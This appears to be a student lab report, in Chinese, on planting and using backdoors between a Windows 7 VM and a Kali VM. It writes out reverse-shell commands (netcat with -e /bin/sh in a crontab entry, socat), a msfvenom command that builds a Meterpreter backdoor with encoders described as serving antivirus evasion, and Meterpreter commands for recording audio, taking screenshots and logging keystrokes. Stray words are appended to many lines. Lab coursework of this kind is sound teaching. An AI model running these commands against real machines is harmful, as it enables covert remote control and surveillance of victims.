例舉你能想到的一個後門進入到你係統中的可能方式?linux
在網站上下載非官方軟件,所下載的軟件中攜帶假裝過的後門程序。shell
例舉你知道的後門如何啓動起來(win及linux)的方式?windows
將後門程序假裝爲被啓動項目。網絡
Meterpreter有哪些給你映像深入的功能?tcp
記錄音頻、獲取入侵主機權限。編輯器
如何發現本身有系統有沒有被安裝後門?工具
使用殺毒軟件進行查殺。網站
使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權ui
ipconfig
獲取windows系統的IP地址和相關信息。
打開終端,輸入ifconfig -a
獲取Kali的IP地址和相關信息。編碼
如下實踐Windows基於Win10-64bit, Kali2-64bit.
如下實踐Windows基於Win7-64bit, Kali2-64bit.(後同)
1.Linux運行監聽指令
2.Windows反彈鏈接Linux
3.Linux下看到Windows的命令提示
在win7的cmd中使用ncat.exe -l 5330
監聽端口,Kali中使用nc win7主機IP 5330
鏈接win7系統輸入數據,在win7同步顯示。
crontab -e
指令編輯一條定時任務(使用VIM編輯器編輯),在最後一行添加43 * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh
(時間設置在Kali系統當前時間的後一分鐘)時間到43分時,windows系統得到Kali的shell,在cmd中輸入命令whoami
獲得結果
在Kali環境下輸入指令socat - tcp:192.168.204.135:5330,第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5330端口,此時可成功得到cmd shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.135 LPORT=5330 -f exe > 20155330_backdoor.exe
生成後門程序
參數說明:
參數 | 相關說明 |
---|---|
-p | 使用的payload。windows/meterpreter/reverse_tcp至關於shellcode。 |
-x | 使用的可執行文件模板,payload(shellcode)寫入到該可執行文件中。 |
-e | 使用的編碼器,用於對shellcode變形,爲了免殺。 |
-i | 編碼器的迭代次數。 |
-b | badchar是payload中須要去除的字符。 |
LHOST | 是反彈回連的IP |
LPORT | 是回連的端口 |
-f | 生成文件的類型 |
> | 輸出到哪一個文件 |
msfconsole
use exploit/multi/handler
進行偵聽,並設置相關參數.record_mic
截獲一段音頻screenshot
截屏keyscan_start
指令記錄擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄getuid
指令查看當前用戶這次實驗首先要保證Kali和windows系統主機可以經過網絡相互鏈接,才能進行以後的步驟。實驗中主要遇到的問題就是電腦的攝像頭沒法鏈接到虛擬機,甚至在本機上也常常出現錯誤,應該是開學初的強制更新過程當中驅動出了問題。